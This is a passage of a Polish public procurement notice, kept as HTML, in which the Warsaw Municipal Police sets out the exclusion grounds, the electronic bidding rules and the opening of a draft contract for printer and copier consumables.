Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu wykazania braku podstaw do wykluczenia: a) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy Pzp.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Wykonawca zobowiązany jest złożyć: 1) Wniosek o dopuszczenie do udziału w licytacji o treści zgodnej ze wzorem stanowiącym załącznik nr 1 do Ogłoszenia, 2) Oświadczenie wykonawcy dotyczące wykazania braku podstaw do wykluczenia o treści zgodnej ze wzorem stanowiącym załącznik nr 2 do Ogłoszenia (o którym mowa w sekcji III pkt 3 Ogłoszenia). 3) Dokument potwierdzający, że wniosek został podpisany przez osobę/y właściwie umocowaną/e, jeżeli nie wynika to z innych dokumentów załączonych do Wniosku. Po przekazaniu informacji dotyczącej wyników kwalifikacji Wykonawców do udziału w licytacji, Wykonawca składa oświadczenia dotyczące przynależności albo braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. Wykonawca nie należący do żadnej grupy kapitałowej może złożyć odpowiednio wypełnione oświadczenie wraz z wnioskiem. Zasady wspólnego ubiegania się o udzielenie zamówienia przez wykonawców, o których mowa w art. 23 ustawy Pzp: 1) Wykonawcy występujący wspólnie (np. spółki cywilne, konsorcja) są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich (tj. konsorcjum) w postępowaniu albo do reprezentowania ich (tj. konsorcjum) w postępowaniu albo do reprezentowania ich (tj. konsorcjum) w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Oryginał pełnomocnictwa lub kopii poświadczonej notarialnie powinien być załączony do wniosku i zawierać w szczególności wskazania: - postępowania o zamówienie publiczne, którego dotyczy; - wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby; - ustanowionego Pełnomocnika oraz zakresu jego umocowania. 3) W przypadku złożenia wspólnego wniosku, w formularzu wniosku pełnomocnik zaznacza w czyim imieniu występuje. 4) Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem. 5) Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego sam musi wykazać brak podstaw do wykluczenia z art. 24 ust. 1 pkt 12-23 ustawy Pzp (oświadczenie o niepodleganiu wykluczeniu, o którym mowa w sekcji III – pkt. 3</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Licytacja elektroniczna</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej"></span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>100,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6">https://strazmiejska-waw.logintrade.net/rejestracja/?do_not_show_cookie_info=true</span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7">https://strazmiejska.waw.pl/</span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8">W licytacji może wziąć udział osoba fizyczna, osoba prawna lub jednostka organizacyjna nieposiadająca osobowości prawnej oraz podmioty te występujące wspólnie, o ile spełniają warunki określone w ustawie oraz ogłoszeniu o zamówieniu. Warunkiem wzięcia udziału w licytacji elektronicznej jest dysponowanie kwalifikowanym podpisem elektronicznym, bowiem zgodnie z art.10 a ust. 5 w związku z art.78 ust. 1 ustawy Pzp oferty pod rygorem nieważności opatruje się kwalifikowanym podpisem elektronicznym. Wykonawca, pobiera ze wskazanej w ogłoszeniu o zamówieniu strony internetowej http://www.strazmiejska.waw.pl wzór wniosku. Następnie, w przypadku zainteresowania udziałem w licytacji elektronicznej, składa wniosek o dopuszczenie do udziału w postępowaniu wraz z załącznikami - między innymi: Oświadczeniem Wykonawcy, którego wzór stanowi załącznik nr 2 do Ogłoszenia. Złożenie wniosku jednocześnie oznacza akceptację warunków licytacji i wzoru umowy. Zamawiający, po weryfikacji nadesłanych wniosków, informuje Wykonawców o wyniku kwalifikacji. Zamawiający poprzez platformę zakupową przekaże zakwalifikowanym Wykonawcom zaproszenie do udziału w licytacji elektronicznej. Licytacja elektroniczna zwana jest przez platformę zakupową "Aukcją elektroniczną". UWAGA!!! Wszędzie tam gdzie występuje używana przez platformę zakupową nazwa "Aukcja elektroniczna" należy przez to rozumieć postępowanie prowadzone na podstawie art 74 ustawy Pzp w trybie licytacji elektronicznej. Zaproszenie zostanie przekazane drogą elektroniczną na adres wskazany we wniosku o dopuszczenie do udziału w licytacji. Treść zaproszenia zawierać będzie link do platformy zakupowej, na której odbywać się będzie licytacja (aukcja) oraz parametry licytacji elektronicznej (Reguły aukcji) takie jak: data i godzina otwarcia, czas trwania i warunki zamknięcia licytacji (aukcji). Zaproszenie do udziału w licytacji (aukcji) zawiera informację o sposobie rejestracji na platformie zakupowej. W chwili zaproszenia do udziału w licytacji elektronicznej (aukcji) zamawiający poprzez platformę zakupową udostępnia wszystkim wykonawcom do chwili otwarcia licytacji (aukcji) właściwej możliwość przeprowadzania licytacji (aukcji) testowych. Formularzu Wniosku należy wpisać osobę uprawnioną do składania ofert w imieniu Wykonawcy w trakcie licytacji elektronicznej. W przypadku, gdy będzie to inna osoba niż podpisująca ofertę, należy załączyć do oferty pełnomocnictwo dla tej osoby, podpisane przez osobę/y uprawnioną/e do reprezentowania Wykonawcy, z którego wynikać będzie prawo do reprezentowania Wykonawcy w licytacji elektronicznej. Po otrzymaniu zaproszenia w przypadku gdy Wykonawca nie posiada jeszcze konta rejestruje się na platformie zakupowej zamawiającego postępując zgodnie z przekazaną procedurą rejestracji. W trakcie rejestracji Wykonawca otrzyma login i hasło do platformy zakupowej. Adres e-mail użyty do rejestracji lub do logowania w platformie zakupowej musi być tożsamy z adresem e-mail we wniosku o dopuszczenie do udziału w licytacji wskazanym przy osobie upoważnionej do składania ofert w trakcje licytacji elektronicznej. Wymagania dotyczące urządzeń informatycznych.W przypadku licytacji z podpisem elektronicznym dopuszczalne są przeglądarki internetowe:- dla Windows Vista: Internet Explorer 8, Internet Explorer 9- dla Windows 7: Internet Explorer 9, Internet Explorer 11- dla Windows 8: Internet Explorer 11- dla Windows 10: Internet Explorer 11Wspierane są rozwiązania dostarczane przez firmy:- Polskie Centrum Certyfikacji Elektronicznej Sigillum Polskiej Wytwórni Papierów Wartościowych S.A.- Centrum Obsługi Podpisu Elektronicznego Szafir Krajowej Izby Rozliczeniowej S.A.- Powszechne Centrum Certyfikacji Certum firmy Unizeto Technologies SA.- Kwalifikowane Centrum certyfikacji Kluczy CenCert firmy Safe Technologies S.A.Pozostałe wymagania techniczne:- dostęp do sieci internet- obsługa przez przeglądarkę protokołu XMLHttpRequest - ajax- włączona obsługa JavaScript- zalecana szybkość łącza internetowego powyżej 500 KB/s- zainstalowany Acrobat Reader- zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy </span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9">W trakcie licytacji Wykonawca podaje cenę brutto (z VAT) za wykonanie całego zamówienia. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim Wykonawcom informacje o pozycji składanych przez nich ofert, liczbie Wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców. Cena ofertowa winna obejmować wszystkie koszty i składniki wraz z narzutami, niezbędne do wykonania przedmiotu zamówienia w zakresie objętym Ogłoszeniem o zamówieniu oraz wzorem umowy. Zamawiający nie zapewnia zwolnienia Wykonawcy z żadnych podatków, opłat, ani nie będzie zwracał żadnych kar należnych z jakiegokolwiek tytułu, cen transportu, czynności, usług, świadczeń, opłat, ceł, podatków itp., których nie przewidziano w Opisie. Ryzyko konieczności wykonania wszelkich prac towarzyszących, mogących pojawić się w trakcie realizacji zamówienia, ryzyko związane ze zmianami kursów walut, ceł itp., obciąża Wykonawcę i należy uwzględnić je w cenie oferty. Za ofertę najkorzystniejszą zostanie uznana oferta, która zawierać będzie, w chwili zamknięcia licytacji elektronicznej, najniższą cenę brutto realizacji całego zamówienia. Wykonawca, który zaproponował najniższą cenę brutto realizacji przedmiotowego zamówienia, zostaje zwycięzcą licytacji elektronicznej. Minimalna wysokość postąpień - 500,00 zł. Czas trwania licytacji elektronicznej – 15 minut. Zamawiający przewiduje jedną 5 minutową dogrywkę w przypadku złożenia postąpienia w ostatniej minucie trwania licytacji.</span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja jednoetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: 15 minut</span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data">2020-02-25</span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"> 11:00:00</span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12">2020.03.09</span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13">Zamawiający otworzy licytację elektroniczną 09.03.2020 r. o godzinie 11:00. Zamawiający ustala czas trwania licytacji na 15 minut. Licytacja zostanie zamknięta, gdy nie zostanie złożona żadna oferta lub, gdy od złożenia oferty przez jednego z Wykonawców nie zostanie złożona żadna inna oferta, jednakże nie wcześniej niż po upływie 15 minut od otwarcia licytacji. </span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia">WZÓRU M O W A Nr ………………zawarta w dniu ........................... w Warszawie,w wyniku wyboru oferty Wykonawcy, złożonej w postępowaniu o udzielenie zamówienia publicznego, udzielanym w częściach, których łączna wartość przekracza 30.000 euro – nr sprawy ……………………., prowadzonym w trybie ………………………………………, na podstawie przepisów ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz.U. z 2019 poz. 1843), zwanej dalej ustawą Prawo zamówień publicznych,pomiędzy:Miastem Stołecznym Warszawa, Plac Bankowy 3/5, 00-950 Warszawa, NIP: 525-22-48-481, w imieniu i na rzecz którego działa Straż Miejska m.st. Warszawy, utworzona na podstawie uchwały Rady m.st. Warszawy nr XII/54/91 z dnia 21 stycznia 1991 r. w sprawie utworzenia Straży Miejskiej, działająca na podstawie uchwały Rady m.st. Warszawy nr IX/158/2011 z dnia 10 lutego 2011 r. w sprawie nadania statutu Straży Miejskiej m.st. Warszawy,reprezentowana przez:Zbigniewa Leszczyńskiego – Komendanta Straży Miejskiej m.st. Warszawy, działającego na podstawie udzielonego przez Prezydenta m.st. Warszawy pełnomocnictwa nr GP-0158/3141/2007 z dnia 14.05.2007 r.,zwanym dalej Zamawiającym,a…………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………zwanym dalej Wykonawcą,łącznie zwanymi dalej Stronami,o następującej treści:§ 11.	Przedmiotem umowy jest sukcesywna dostawa materiałów eksploatacyjnych do urządzeń wielofunkcyjnych, drukarek oraz kserokopiarek, w asortymencie i liczbie zgodnej z opisem przedmiotu zamówienia (OPZ), znajdującym się w Załączniku nr 1 do niniejszej umowy, będącym jednocześnie Formularzem cenowym.2.	Wykonawca zobowiązany jest, w trakcie obowiązywania umowy oraz przez 3 miesiące od daty jej zakończenia, do odbioru od Zamawiającego zużytych materiałów eksploatacyjnych w celu recyklingu lub utylizacji, zgodnie z przepisami ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2019 r. poz. 701 ze zm.). Wykonawca zobowiązany jest przedstawić, na żądanie Zamawiającego, zezwolenie na zbieranie odpadów i prowadzenie ich przetwarzania.§ 21.	Wykonawca zobowiązuje się do sprzedaży i dostarczenia przedmiotu umowy, a Zamawiający zobowiązuje się do jego odbioru i zapłaty umówionej ceny.2.	Przedmiot umowy będzie realizowany sukcesywnie, na podstawie zamówień jednostkowych składanych do Wykonawcy drogą elektroniczną na adres e-mail: ……………………… lub faksem pod nr ……………………...3.	Termin realizacji każdego zamówienia jednostkowego, nie może być dłuższy niż 7 dni kalendarzowych od dnia złożenia zamówienia, przy czym ostatnia dostawa nastąpi nie później niż dnia 10 grudnia 2020 r.4.	Przedmiot umowy dostarczany będzie na adres Straży Miejskiej m.st. Warszawy: 01-163 Warszawa, ul. Sołtyka 8/10, budynek B, od poniedziałku do piątku, w godzinach 8.00-14.00, na koszt i ryzyko Wykonawcy.5.	Jeżeli w trakcie odbioru zostaną stwierdzone:1)	braki ilościowe - Wykonawca jest zobowiązany do dostarczenia brakującej liczby materiałów, w terminie nie dłuższym niż 3 dni robocze (od poniedziałku do piątku), liczone od dnia poinformowania Wykonawcy o stwierdzonych brakach, 2)	wady jakościowe - Wykonawca jest zobowiązany do wymiany wadliwych materiałów na wolne od wad, w terminie nie dłuższym niż 3 dni robocze (od poniedziałku do piątku), liczone od dnia poinformowania Wykonawcy o stwierdzonych wadach.6.	Wykonawca zobowiązuje się dostarczyć materiały eksploatacyjne „wysokowydajne", tzn.: materiały o maksymalnej, dostępnej na rynku pojemności zasobnika dla danego urządzenia. Dostarczone materiały eksploatacyjne (wraz ze wszystkimi elementami wchodzącymi w ich skład) muszą być fabrycznie nowe, bez śladów używania i uszkodzenia, pełnowartościowe, nieregenerowane, opakowane hermetycznie. Dostarczone materiały eksploatacyjne muszą być materiałami odpowiadającymi parametrom techniczno-eksploatacyjnym wskazanych urządzeń, zgodnie z wymogami producenta tych urządzeń. Dostarczone materiały eksploatacyjne muszą posiadać gwarancję producenta, do momentu wyczerpania środka barwiącego w przypadku materiałów eksploatacyjnych, których to dotyczy.7.	Materiały eksploatacyjne, w których zostały użyte znaki towarowe, 